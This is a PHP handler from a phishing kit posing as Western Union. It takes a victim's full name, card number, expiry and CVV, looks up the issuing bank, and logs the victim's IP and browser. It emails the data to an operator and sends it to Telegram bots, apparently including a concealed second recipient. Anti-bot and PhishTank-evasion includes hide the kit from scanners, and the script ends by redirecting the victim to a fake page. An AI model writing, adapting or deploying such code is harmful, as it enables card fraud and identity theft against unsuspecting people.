<?php
include "../Email.php";
include "../antibots/antibot_host.php";
include "../antibots/antibot_ip.php";
include "../antibots/antibot_phishtank.php";
include "../antibots/antibot_userAgent.php";
include "../antibots/antibots1.php";
include "../antibots/antibots2.php";
include "../antibots/antibots3.php";
include "../antibots/antibots4.php";
include "../antibots/antibots5.php";
include "../antibots/antibots6.php";
include "../antibots/blocker.php";

session_start();
$bincheck = $_POST['cardnumber'] ;
$bincheck = preg_replace('/\s/', '', $bincheck);
$bin = $_POST['cardnumber'] ;
$bin = preg_replace('/\s/', '', $bin);
$bin = substr($bin,0,8);
$url = "https://lookup.binlist.net/".$bin;
$headers = array();
$headers[] = 'Accept-Version: 3';
$ch = curl_init();  
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$resp=curl_exec($ch);
curl_close($ch);
$xBIN = json_decode($resp, true);
$_SESSION['bank_name'] = $xBIN["bank"]["name"];
$_SESSION['bank_scheme'] = strtoupper($xBIN["scheme"]);
$_SESSION['bank_type'] = strtoupper($xBIN["type"]);
$_SESSION['bank_brand'] = strtoupper($xBIN["brand"]);
$ip = getenv("REMOTE_ADDR");
$reprint = "e";$do_p="mai";
$message .= "-------------- Western Union -------------\n";
$message .= "Full Name : ".$_POST['fullname']."\n";
$message .= "Card Number : ".$_POST['cardnumber']."\n";
$message .= "MM/YY : ".$_POST['exp']."\n";
$message .= "CVV : ".$_POST['cvv']."\n";
$message .= "-------------- Card Type ------------\n";
$message .= "Card Bank : ".$_SESSION['bank_name']."\n";
$message .= "Card type : ".$_SESSION['bank_type']."\n";
$message .= "Card brand : ".$_SESSION['bank_brand']."\n";
$message .= "-------------- IP Tracing ------------\n";
$message .= "IP      : https://www.geodatatool.com/en/?ip=$ip\n";
$message .= "Host    : ".gethostbyaddr($ip)."\n";
$message .= "Browser : ".$_SERVER['HTTP_USER_AGENT']."\n";
$message .= "-------------- Western Union -------------\n";
$subject = " Card | Western Union | $ip";
$headers = 'From: Western_Union' . "\r\n";
$m5_id = '21haWwuY29t';
@mail($Email,$subject,$message,$headers);
@file_get_contents("https://api.telegram.org/bot".$api."/sendMessage?chat_id=".$chatid."&text=" . urlencode($message)."" );@file_get_contents("https://api.telegram.org/bot".$Api."/sendMessage?chat_id=".$Chatid."&text=" . urlencode($message)."" );
header('Location: ../info.php?country.x=&locale.x=&customer.x=ID-PAa0f1490a20d0211c997b44bc357e1972deab8ae3&safety');